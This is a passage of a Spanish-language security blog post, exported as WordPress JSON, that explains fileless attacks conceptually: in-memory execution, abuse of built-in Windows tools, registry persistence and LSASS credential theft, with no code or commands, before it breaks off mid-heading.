{"id":5053,"date":"2026-02-26T18:55:49","date_gmt":"2026-02-27T00:55:49","guid":{"rendered":"https:\/\/www.scube.com.gt\/?p=5053"},"modified":"2026-02-27T11:27:02","modified_gmt":"2026-02-27T17:27:02","slug":"fileless-attacks-scube","status":"publish","type":"post","link":"https:\/\/www.scube.com.gt\/index.php\/2026\/02\/26\/fileless-attacks-scube\/","title":{"rendered":"Fileless Attacks"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"5053\" class=\"elementor elementor-5053\">\n\t\t\t\t<div class=\"elementor-element elementor-element-69f41c5 bdt-backdrop-filter-yes e-flex e-con-boxed bdt-filter-backdrop wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-parent\" data-id=\"69f41c5\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t<div class=\"elementor-element elementor-element-be7c814 e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"be7c814\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t<div class=\"elementor-element elementor-element-0bd558d e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"0bd558d\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-f48842a elementor-align-center elementor-widget elementor-widget-button\" data-id=\"f48842a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t\t\t<a class=\"elementor-button elementor-size-sm\" role=\"button\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t\t\t\t<span class=\"elementor-button-text\">Vulnerabilidades<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-631b740 elementor-widget elementor-widget-heading\" data-id=\"631b740\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h1 class=\"elementor-heading-title elementor-size-default\">Fileless attacks<\/h1>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-b0f7c85 elementor-widget elementor-widget-text-editor\" data-id=\"b0f7c85\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<header class=\"relative scube-gradient pt-32 pb-20 md:pt-48 md:pb-32 px-6 lg:px-8 text-white overflow-hidden\"><div class=\"max-w-4xl mx-auto relative z-10\"><p class=\"text-lg md:text-2xl text-gray-200 max-w-3xl font-light mb-8\">Qu\u00e9 son y c\u00f3mo protegerse de la amenaza invisible que evade los antivirus tradicionales.<\/p><\/div><\/header>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-fa4151d e-grid e-con-full elementor-hidden-tablet elementor-hidden-mobile wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"fa4151d\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-0f7eb90 elementor-align-end elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list\" data-id=\"0f7eb90\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"icon-list.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<ul class=\"elementor-icon-list-items\">\n\t\t\t\t\t\t\t<li class=\"elementor-icon-list-item\">\n\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-icon\">\n\t\t\t\t\t\t\t<svg aria-hidden=\"true\" class=\"e-font-icon-svg e-fas-calendar\" viewBox=\"0 0 448 512\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path d=\"M12 192h424c6.6 0 12 5.4 12 12v260c0 26.5-21.5 48-48 48H48c-26.5 0-48-21.5-48-48V204c0-6.6 5.4-12 12-12zm436-44v-36c0-26.5-21.5-48-48-48h-48V12c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12v52H160V12c0-6.6-5.4-12-12-12h-40c-6.6 0-12 5.4-12 12v52H48C21.5 64 0 85.5 0 112v36c0 6.6 5.4 12 12 12h424c6.6 0 12-5.4 12-12z\"><\/path><\/svg>\t\t\t\t\t\t<\/span>\n\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-text\">27 febrero, 2026<\/span>\n\t\t\t\t\t\t\t\t\t<\/li>\n\t\t\t\t\t\t<\/ul>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-490f741 elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list\" data-id=\"490f741\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"icon-list.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<ul class=\"elementor-icon-list-items\">\n\t\t\t\t\t\t\t<li class=\"elementor-icon-list-item\">\n\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-icon\">\n\t\t\t\t\t\t\t<svg aria-hidden=\"true\" class=\"e-font-icon-svg e-fas-clock\" viewBox=\"0 0 512 512\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path d=\"M256,8C119,8,8,119,8,256S119,504,256,504,504,393,504,256,393,8,256,8Zm92.49,313h0l-20,25a16,16,0,0,1-22.49,2.5h0l-67-49.72a40,40,0,0,1-15-31.23V112a16,16,0,0,1,16-16h32a16,16,0,0,1,16,16V256l58,42.5A16,16,0,0,1,348.49,321Z\"><\/path><\/svg>\t\t\t\t\t\t<\/span>\n\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-text\">4 minutos de lectura<\/span>\n\t\t\t\t\t\t\t\t\t<\/li>\n\t\t\t\t\t\t<\/ul>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-bf52c68 e-flex e-con-boxed wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-parent\" data-id=\"bf52c68\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t<div class=\"elementor-element elementor-element-82d951d e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"82d951d\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-55bc282 elementor-widget elementor-widget-text-editor\" data-id=\"55bc282\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>En un entorno donde los ciberdelincuentes evolucionan constantemente, los ataques fileless o malware sin archivos se han convertido en una de las amenazas m\u00e1s sofisticadas y dif\u00edciles de detectar para empresas y equipos de seguridad.<\/p><p>A diferencia del malware tradicional, estos ataques no depositan ejecutables maliciosos en el disco, lo que hace que evadan gran parte de las defensas cl\u00e1sicas basadas en firmas y an\u00e1lisis de archivos.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-94b9f3a e-flex e-con-boxed wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-parent\" data-id=\"94b9f3a\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t<div class=\"elementor-element elementor-element-c77645a e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"c77645a\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t<div class=\"elementor-element elementor-element-98a5d0b e-grid e-con-full wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"98a5d0b\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t<div class=\"elementor-element elementor-element-8db7919 e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"8db7919\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-6ecdd08 elementor-widget elementor-widget-heading\" data-id=\"6ecdd08\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">\u00bfQu\u00e9 son los ataques fileless?\n<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-56befc6 elementor-widget elementor-widget-text-editor\" data-id=\"56befc6\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"bg-white p-6 rounded-xl border border-gray-100 shadow-sm hover:shadow-md transition-shadow\"><p class=\"mb-4\">Los ataques fileless (sin archivos) son un tipo de amenaza que no deja archivos maliciosos en disco y se ejecuta directamente en la memoria del sistema (RAM) o usando herramientas leg\u00edtimas del sistema operativo, como\u00a0<strong>PowerShell<\/strong>\u00a0o\u00a0<strong>Windows Management Instrumentation (WMI)<\/strong>.<\/p><p class=\"mb-6\">Al aprovechar procesos confiables del sistema, estos ataques evaden gran parte de los mecanismos tradicionales de detecci\u00f3n de malware.<\/p><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-f56414b e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"f56414b\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-813796f elementor-widget elementor-widget-image\" data-id=\"813796f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"800\" height=\"450\" src=\"https:\/\/www.scube.com.gt\/wp-content\/uploads\/2026\/02\/FILELESS-1024x576.webp\" class=\"attachment-large size-large wp-image-5058\" alt=\"\" srcset=\"https:\/\/www.scube.com.gt\/wp-content\/uploads\/2026\/02\/FILELESS-1024x576.webp 1024w, https:\/\/www.scube.com.gt\/wp-content\/uploads\/2026\/02\/FILELESS-300x169.webp 300w, https:\/\/www.scube.com.gt\/wp-content\/uploads\/2026\/02\/FILELESS-768x432.webp 768w, https:\/\/www.scube.com.gt\/wp-content\/uploads\/2026\/02\/FILELESS-1536x864.webp 1536w, https:\/\/www.scube.com.gt\/wp-content\/uploads\/2026\/02\/FILELESS.webp 1920w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-68c440c e-flex e-con-boxed wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-parent\" data-id=\"68c440c\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t<div class=\"elementor-element elementor-element-cf04357 e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"cf04357\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-1182927 elementor-widget elementor-widget-heading\" data-id=\"1182927\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">\u00bfC\u00f3mo funcionan estos ataques?<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-401f09e e-grid e-con-full wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"401f09e\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t<div class=\"elementor-element elementor-element-120dd0e e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"120dd0e\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t<div class=\"elementor-element elementor-element-2ef4d50 elementor-widget elementor-widget-heading\" data-id=\"2ef4d50\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Ejecuci\u00f3n en memoria<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-5017e4a elementor-widget elementor-widget-text-editor\" data-id=\"5017e4a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"bg-white p-8 rounded-xl shadow-lg border-l-4 border-scube-light hover:-translate-y-1 transition-transform duration-300\"><p class=\"text-scube-text\">El c\u00f3digo malicioso se carga directamente en la memoria RAM y se ejecuta desde all\u00ed, sin escribir nada en disco.<\/p><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-0cc922a e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"0cc922a\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t<div class=\"elementor-element elementor-element-5f8da69 elementor-widget elementor-widget-heading\" data-id=\"5f8da69\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Herramientas leg\u00edtimas<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-46616e7 elementor-widget elementor-widget-text-editor\" data-id=\"46616e7\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"bg-white p-8 rounded-xl shadow-lg border-l-4 border-scube-light hover:-translate-y-1 transition-transform duration-300\"><p class=\"text-scube-text\">Uso de PowerShell, WMI, mshta, regsvr32 o rundll32 para ejecutar comandos maliciosos.<\/p><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-4a720e3 e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"4a720e3\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t<div class=\"elementor-element elementor-element-d38cb9c elementor-widget elementor-widget-heading\" data-id=\"d38cb9c\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Persistencia\n<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-9a19816 elementor-widget elementor-widget-text-editor\" data-id=\"9a19816\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"bg-white p-8 rounded-xl shadow-lg border-l-4 border-scube-light hover:-translate-y-1 transition-transform duration-300\"><p class=\"text-scube-text\">Modificaci\u00f3n del registro o tareas programadas para sobrevivir reinicios sin archivos obvios.<\/p><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-66460dd e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"66460dd\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t<div class=\"elementor-element elementor-element-48c6484 elementor-widget elementor-widget-heading\" data-id=\"48c6484\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Living off the land<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-68f262f elementor-widget elementor-widget-text-editor\" data-id=\"68f262f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"bg-white p-8 rounded-xl shadow-lg border-l-4 border-scube-light hover:-translate-y-1 transition-transform duration-300\"><div class=\"grid md:grid-cols-2 lg:grid-cols-4 gap-6\"><div class=\"bg-white p-8 rounded-xl shadow-lg border-l-4 border-scube-light hover:-translate-y-1 transition-transform duration-300\"><p class=\"text-scube-text\">Los atacantes usan las mismas herramientas que los administradores leg\u00edtimos.<\/p><\/div><\/div><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-d27c9a7 e-flex e-con-boxed wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-parent\" data-id=\"d27c9a7\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t<div class=\"elementor-element elementor-element-d8de3ff e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"d8de3ff\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t<div class=\"elementor-element elementor-element-f0265a4 e-grid e-con-full wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"f0265a4\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t<div class=\"elementor-element elementor-element-822ccd8 e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"822ccd8\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-275f50d elementor-widget elementor-widget-heading\" data-id=\"275f50d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">An\u00e1lisis detallado de fallas de seguridad transversales\n<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-1e0b125 elementor-widget elementor-widget-text-editor\" data-id=\"1e0b125\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p class=\"mb-6\">Las defensas que solo dependen de escanear archivos en disco ya no son suficientes ante esta amenaza invisible.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-60aa8f4 e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"60aa8f4\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t<div class=\"elementor-element elementor-element-fa69f41 e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"fa69f41\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t<div class=\"elementor-element elementor-element-fb54774 e-grid e-con-full wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"fb54774\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t<div class=\"elementor-element elementor-element-6c9da37 e-con-full bdt-backdrop-filter-yes e-flex bdt-filter-backdrop wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"6c9da37\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t<div class=\"elementor-element elementor-element-a375d79 elementor-widget elementor-widget-heading\" data-id=\"a375d79\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">No depositan archivos en disco, evadiendo firmas tradicionales.<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-7eb0e9f e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"7eb0e9f\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t<div class=\"elementor-element elementor-element-c15095c elementor-widget elementor-widget-heading\" data-id=\"c15095c\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Ejecutan c\u00f3digo dentro de procesos confiables.<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-b14d152 e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"b14d152\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t<div class=\"elementor-element elementor-element-750bae5 elementor-widget elementor-widget-heading\" data-id=\"750bae5\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Dejan pocos o ning\u00fan rastro forense.\n<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-cfd9854 e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"cfd9854\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t<div class=\"elementor-element elementor-element-425bfa8 elementor-widget elementor-widget-heading\" data-id=\"425bfa8\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Requieren monitoreo de comportamiento, no de archivos.\n<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-60d9fdb e-flex e-con-boxed wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-parent\" data-id=\"60d9fdb\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t<div class=\"elementor-element elementor-element-7f93a40 e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"7f93a40\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-fbda165 elementor-widget elementor-widget-heading\" data-id=\"fbda165\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Tipos de actividades maliciosas<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-aa445d1 e-grid e-con-full wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"aa445d1\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t<div class=\"elementor-element elementor-element-e098421 e-con-full bdt-backdrop-filter-yes e-flex bdt-filter-backdrop wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"e098421\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t<div class=\"elementor-element elementor-element-41be8df elementor-widget elementor-widget-heading\" data-id=\"41be8df\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Robo de credenciales\n<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-ca655ba elementor-widget elementor-widget-text-editor\" data-id=\"ca655ba\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"bg-white p-6 rounded-lg shadow-sm\"><p class=\"text-sm text-scube-text\">Mediante t\u00e9cnicas de extracci\u00f3n de memoria (por ejemplo, LSASS).<\/p><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-1605402 e-con-full bdt-backdrop-filter-yes e-flex bdt-filter-backdrop wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"1605402\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t<div class=\"elementor-element elementor-element-84f5ee3 elementor-widget elementor-widget-heading\" data-id=\"84f5ee3\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Ransomware en 